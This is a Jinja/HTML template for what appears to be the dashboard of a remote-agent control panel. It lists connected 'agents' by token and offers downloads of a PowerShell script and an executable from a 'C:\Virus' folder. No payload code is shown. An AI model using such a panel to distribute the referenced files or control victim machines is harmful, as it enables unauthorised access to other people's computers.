<!DOCTYPE html>
<html>
    <head>
        <meta http-equiv="refresh" content="4">
        <title>Welcome</title>
        <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
    <style>
        /* CSS for welcome page */
        .topnav {
            background-color: #333;
            overflow: hidden;
        }

        .topnav a {
            float: left;
            color: #f2f2f2;
            text-align: center;
            padding: 14px 16px;
            text-decoration: none;
            font-size: 17px;
        }

        .topnav a:hover {
            background-color: #ddd;
            color: black;
        }

        .topnav a.active {
            background-color: #808080;
            color: white;
        }
        .download {
            padding: 14px 16px;
            font-size: 20px;
        }
        .container {
            display: grid;
            grid-template-columns: repeat(auto-fill, minmax(200px, 1fr));
            grid-gap: 20px;
            justify-items: center;
            align-items: center;
            padding: 20px;
        }

        .container form {
            display: flex;
            justify-content: center;
            align-items: center;
        }

        .container button {
            width: 150px;
            height: 100px;
            margin: 10px;
            font-size: 20px;
        }
    </style>
</head>
<body>
    <div class="topnav">
        <a href="logout">Logout</a>
        <a class="active" href="dashboard">Dashboard</a>
        <a href="contact">Contact</a>
        <a href="about">About</a>
    </div>

<!-- Auto width -->
    <div class="download">
    <a href="{{ url_for('download', agent_id=999, path= 'C:\\Virus\\script.ps1') }}"  download="script.ps1"> <button ><i class="fa fa-download"></i> Download script</button></a>
    <a href="{{ url_for('download', agent_id=999, path= 'C:\\Virus\\ChildProcess.exe') }}"  download="ChildProcess.exe"> <button ><i class="fa fa-download"></i> Download ChildProcess</button></a>
    </div>
    <div class="container">
        <!-- Iterate over agents and create a button for each -->
        {% for agent in agents %}
        <form action="/agent/{{ agent.getToken() }}" method="get">
            <button type="submit" class="btn btn-outline-dark">{{ agent.name }}</button>
        </form>
        {% endfor %}
    </div>
</body>
</html>